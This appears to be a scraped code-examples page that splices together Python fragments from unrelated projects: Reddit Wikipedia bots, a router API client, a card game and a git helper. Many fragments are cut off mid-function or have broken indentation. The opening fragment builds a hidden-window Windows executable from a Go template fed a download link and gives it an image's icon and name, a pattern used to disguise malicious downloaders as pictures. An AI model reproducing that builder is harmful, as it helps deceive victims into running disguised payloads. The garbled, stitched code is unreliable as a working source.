    host = input("Direct Link: ")
    info("Reading Go Template")
    with open('./res/bin.go', 'r') as p:
        go_file = p.read()
    go_file = go_file.replace('<urlhere>', host)
    go_file = go_file.replace('<filename>', outimg)
    go_file = go_file.replace('<psimage_output>', data)
    bitmap_path = os.getcwd() + '\\dist\\' + outimg
    go_file = go_file.replace('"{0}"'.format(bitmap_path), '$path')
    info("Building Go Binary")
    with open('./tmp/bin.go', 'w') as f:
        f.write(go_file)
    proc = subprocess.Popen(
        'go build -ldflags="-s -w -H=windowsgui" .\\tmp\\bin.go',
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        shell=True)
    success("Build Binary")
    time.sleep(5)

    #Change Icon
    icon = Image.open(img)
    icon.save('./tmp/icon.ico', sizes=[(255, 255)])
    subprocess.Popen('.\\res\\rcedit.exe bin.exe --set-icon .\\tmp\\icon.ico',
                     stdout=subprocess.PIPE,
                     stderr=subprocess.PIPE,
                     shell=True)
    time.sleep(2)
    success("Icon Changed")
    shutil.copyfile("bin.exe", ".\\dist\\" + outimg + ".exe")
    os.remove("bin.exe")
    info("Your file is .\\dist\\{0}.exe".format(outimg))
    success("KTHXBYE")
def load_data(): #TODO load allowed subreddits
  try:
    global banned_users
    banned_users = [line.strip() for line in open('banned_users')]
    global badsubs
    badsubs = [line.strip() for line in open('badsubs')]
    global already_done
    already_done = [line.strip() for line in open('already_done_dump')]
    with open('totalposted') as f:   #TODO replace pickle with simple write store in one file called stats
      global totalposted
      totalposted = pickle.load(f)
    with open ('imgur_client_id', 'r') as myfile:
      global imgur_client_id
      imgur_client_id=myfile.read()
    with open ('userpass', 'r') as myfile:
      global userpass_lines
      userpass_lines=myfile.readlines()
    success("DATA LOADED")
  except:
    file_warning()
    exit()
Esempio n. 42
0
def crawl_reddit():
    already_done = []
    while True:
        already_done=pickle.load(open("stories","r+"))
        for sub in subs:
            for submission in r.get_subreddit(sub).get_new(limit=50):
                if submission.id not in already_done:
                    log("New story: "+sub+" "+submission.short_link+" "+submission.url)
                    already_done.append(submission.id)
                    raw = get_raw(submission.url)+" "+submission.title+" "+submission.selftext
                    tokens = tokenize(raw)
                    victims = find_legislators(tokens)
                    if len(victims) is not 0 and should_comment(tokens):
                        success("Found {0} congressfolk!".format(len(victims)))                        
                        if len(victims) < MAX_SINGLE: 
                            add_single_comment(submission,victims)
                            success("Added comment")
                        else:
                            add_multiple_comments(submission,victims)
                            success("Added multiple comments")
                    pickle.dump(already_done,open("stories","r+"))
       #TODO make pickle filter out anything over an hour old or
       #something?  Or make it only look back for the last 30 seconds
       #of posts?
        time.sleep(30)
Esempio n. 43
0
 def set_qos_band_limit(self, download=-1, upload=-1):
     if (download < 0 and upload < 0):
         return fail("Please send me valid download and/or upload")
     payload = {"manual": 1}
     if (download >= 0):
         payload['download'] = download
     if (upload >= 0):
         payload['upload'] = upload
     req = requests.post(self.endpoint_url + "/api/misystem/set_band",
                         payload)
     if (req.status_code == 200 and req.json()['code'] == 0):
         return success("QoS limits have been set!", data=req.json())
     return fail("There was an error while setting the bandwidth")
Esempio n. 44
0
    def get_wifi_detail(self):
        req = requests.get(self.endpoint_url +
                           "/api/xqnetwork/wifi_detail_all")
        if (req.status_code == 200):
            data = req.json()
            #Setting a ref to "wifiIndex" which can be used for setting the wifi status in the set_wifi method
            for i, wifi_interface in enumerate(data['info']):
                wifi_interface['wifiIndex'] = i + 1
            return success(message="Wifi interfaces retrieved!", data=data)

        return fail(
            message="There was an error while getting the Wifi details...",
            data=req.content)
Esempio n. 45
0
 def accept(self, p2_trades: List[TradingCard]) -> Dict:
     self.p2_trades = p2_trades
     if sorted(self.wants) != sorted([tc.card.name for tc in p2_trades]):
         return util.error("Did not send cards requested")
     # Add cards to temporary pending
     p1_pending: List[Card] = [tc.card for tc in self.p2_trades]
     p2_pending: List[Card] = [tc.card for tc in self.p1_trades]
     # Remove cards from location
     [tc.remove_from_location() for tc in self.p1_trades + self.p2_trades]
     # Add cards to actual pending
     self.p1.pending_cards += p1_pending
     self.p2.pending_cards += p2_pending
     return util.success("Successfully traded cards")
Esempio n. 46
0
def save_device_detail(device):
    devices = [device for device in db.devices.find()]
    if (device.mac in [d['mac'] for d in devices]):
        query = {"mac": device.mac}
        device_mongo = device.statistics
        device_mongo['time'] = time.time()
        dev = db.devices.update_one(query,
                                    {"$push": {
                                        "details": device.statistics
                                    }})
        # dev = db.devices.find_one(query)
        # print(dev)
        return util.success('Device pushed')
    else:
        device_mongo = device.to_dict()
        device_mongo['details'] = []
        insert = db.devices.insert_one(device_mongo)
        if (insert):
            print(insert)
            return util.success('Device added successfully')
        else:
            return util.fail('Cannot add device')
Esempio n. 47
0
    def play_card(self, player: Player, field: Field, card: Card) -> Dict[str, str]:
        '''
        Plays card from anywhere
        '''
        # Add card to field, if fails, cash in and try again
        if not field.add_card(card):
            self.cash_in(field, player)
            if not field.add_card(card):
                return util.error("Cannot add card to field")

        # Move stage forward if playing from hand
        if self.stage_index in (0, 1):
            self.go_next_stage()   
        return util.success('Card successfully played')
r = praw.Reddit("autowikiabot by /u/acini at /r/autowikiabot")
excludekeyword = "leave me alone"
includekeyword = "follow me again"
global banned_users

### Login
with open ('datafile.inf', 'r') as myfile:
    datafile_lines=myfile.readlines()
USERNAME = datafile_lines[0].strip()
PASSWORD = datafile_lines[1].strip()

Trying = True
while Trying:
        try:
                r.login(USERNAME, PASSWORD)
                success("LOGGED IN")
                Trying = False
        except praw.errors.InvalidUserPass:
                fail("WRONG USERNAME OR PASSWORD")
                exit()
        except Exception as e:
          fail(e)
          time.sleep(5)

### Load saved data
try:
  banned_users_page = r.get_wiki_page('autowikiabot','userblacklist')
  banned_users = banned_users_page.content_md.strip().split()
  deleted = 0
  success("DATA LOADED")
except Exception as e:
	    sectionname = sectionname.replace('\\','')
	  sectionname = sectionname.strip().replace('.','%')
	  sectionname = urllib.unquote(sectionname)
	  bluelog("TOPIC: %s"%filter(lambda x: x in string.printable, pagename))
	  bluelog("LINKS TO SECTION: %s"%filter(lambda x: x in string.printable, sectionname))
	  try:
	    page = wikipedia.page(pagename.encode('utf-8','ignore'),auto_suggest=False)
	    section = page.section(sectionname.encode('utf-8','ignore'))
	    if section == None or str(section.encode('utf-8','ignore')).strip() == "":
	      raise Exception("SECTION RETURNED EMPTY")
	    sectionname = sectionname.replace('_',' ')
	    link = page.url+"#"+sectionname
	    link = link.replace(')','\)')
	    page_url = page.url.replace(')','\)')
	    section = section.replace('\n','\n\n>')
	    success("TEXT PACKAGED")
	    section = truncate(section,3500)
	    comment = ("*Here's the linked section ["+sectionname+"]("+link+") from Wikipedia article ["+page.title+"]("+page_url+")* : \n\n---\n\n>"+section+"\n\n---\n\n[^(about)](http://www.reddit.com/r/autowikibot/wiki/index) ^| *^(/u/"+post.author.name+" can reply with 'delete'. Will also delete if comment's score is -1 or less.)*  ^| ^(**To summon**: wikibot, what is something?)")
	    post_reply(comment,post)
	  except Exception as e:
	    #traceback.print_exc()
	    warn("SECTION PROCESSING: %s"%e)
	    continue
	  continue
	
	
	
	### fetch data from wikipedia
	
	url = ("http://en.wikipedia.org/w/api.php?action=query&titles="+url_string_for_fetch+"&prop=pageprops&format=xml")
	try:
  
  
  success("DATA SAVED")

with open ('datafile.inf', 'r') as myfile:
  datafile_lines=myfile.readlines()

### Login
r = praw.Reddit("halowikibot by /u/jmouer at /r/halowikibot")
USERNAME = datafile_lines[0].strip()
PASSWORD = datafile_lines[1].strip()
Trying = True
while Trying:
	try:
		r.login(USERNAME, PASSWORD)
		success("LOGGED IN")
		Trying = False
	except praw.errors.InvalidUserPass:
		fail("WRONG USERNAME OR PASSWORD")
		exit()
	except Exception as e:
	  fail("%s"%e)
	  time.sleep(5)
    
def is_summon_chain(post):
  if not post.is_root:
    parent_comment_id = post.parent_id
    parent_comment = r.get_info(thing_id=parent_comment_id)
    if parent_comment.author != None and str(parent_comment.author.name) == 'USERNAME':
      return True
    else:
  time.sleep(1)

  success("DATA SAVED")

with open ('datafile.inf', 'r') as myfile:
  datafile_lines=myfile.readlines()

### Login
r = praw.Reddit("autowikibot by /u/acini at /r/autowikibot")
USERNAME = datafile_lines[0].strip()
PASSWORD = datafile_lines[1].strip()
Trying = True
while Trying:
	try:
		r.login(USERNAME, PASSWORD)
		success("LOGGED IN")
		Trying = False
	except praw.errors.InvalidUserPass:
		fail("WRONG USERNAME OR PASSWORD")
		exit()
	except Exception as e:
	  fail("%s"%e)
	  time.sleep(5)
    

def post_reply(reply,post):
  global totalposted
  try:
    reply = "#####&#009;\n\n######&#009;\n\n####&#009;\n"+reply
    post.reply(reply)
    totalposted = totalposted + 1
load_data()
r = praw.Reddit("autowikibot by /u/acini at /r/autowikibot")
im = pyimgur.Imgur(imgur_client_id)
linkWords = ['://en.wikipedia.org/wiki/', '://en.m.wikipedia.org/wiki/']
endoflinkWords = ['\n', ' ', '/']
pagepropsdata = ""
  
### Login
USERNAME = userpass_lines[0].strip()
PASSWORD = userpass_lines[1].strip()

Trying = True
while Trying:
        try:
                r.login(USERNAME, PASSWORD)
		success("LOGGED IN")
                Trying = False
        except praw.errors.InvalidUserPass:
                fail("WRONG USERNAME OR PASSWORD")
                exit()
        except Exception as e:
	  fail("%s"%e)
	  time.sleep(5)
	
while True:
  try:
    #comments = r.get_comments("all",limit = 1000)
    #for post in comments:
    for post in praw.helpers.comment_stream(r,'all', limit = None):
      
      ### check if comment has links quotes or is previously processed
Esempio n. 53
0
            # shutil.copytree doesn't overwrite an existing directory
            if os.path.isdir(path_in_repo):
                shutil.rmtree(path_in_repo)
            shutil.copytree(source_path,
                            os.path.join(tmp_repo, basename))
    except IOError, e:
        util.exit_runtime_error(
            "Error while trying to move contents to the git repository: %s" % e)

    os.chdir(tmp_repo)
    util.info("Adding files to git repository...")
    if not util.exec_cmd_status("git add %s" % basename):
        util.exit_runtime_error("Failed to add files to git repository")

    util.info("Committing to git repository...")
    (status, output) = util.exec_cmd_output(
        "git commit -m \"%s\"" %
        ("[grabrc-client] %s" % (options.message or source_path)))
    if not status:
        util.exit_runtime_error("Failed to commit files: %s" % output)

    util.info("Pushing to Github...")
    (status, output) = util.exec_cmd_output("git push")
    util.info("[git push] %s" % output)
    if not status:
        util.exit_runtime_error("Failed to push to the git repository.")
    else:
        util.info("Push successful.")

    util.success("Saved %s to Github." % source_path)

  success("DATA SAVED")

with open ('datafile.inf', 'r') as myfile:
  datafile_lines=myfile.readlines()

### Login
r = praw.Reddit("autowikiabot by /u/timidger at /r/autowikiabot")
USERNAME = datafile_lines[0].strip()
PASSWORD = datafile_lines[1].strip()
Trying = True
while Trying:
        try:
                r.login(USERNAME, PASSWORD)
                success("LOGGED IN")
                Trying = False
        except praw.errors.InvalidUserPass:
                fail("WRONG USERNAME OR PASSWORD")
                exit()
        except Exception as e:
          fail("%s"%e)
          time.sleep(5)

def is_summon_chain(post):
  if not post.is_root:
    parent_comment_id = post.parent_id
    parent_comment = r.get_info(thing_id=parent_comment_id)
    if parent_comment.author != None and str(parent_comment.author.name) == 'autowikiabot':
      return True
    else:
Esempio n. 55
0
def file_warning():
  fail("One or more of data files is not found or is corrupted.")
  log("Have them configured as follows:")
  log("totaldeleted - Create empty file if running for first time.")
  log("banned_users - Create empty file if running for first time. Bot will add banned users automatically. Add manually on separate lines.")
 
### Load saved data
try:
  banned_users = [line.strip() for line in open('banned_users')]
  shared.set('banned_users',banned_users)
  with open('totaldeleted') as f: #TODO replace pickle
      deleted = pickle.load(f)
  with open ('userpass', 'r') as myfile:
    lines=myfile.readlines()
  success("DATA LOADED")
except:
  file_warning()
  exit()



### Login
USERNAME = lines[0].strip()
PASSWORD = lines[1].strip()

Trying = True
while Trying:
        try:
                r.login(USERNAME, PASSWORD)
                success("LOGGED IN")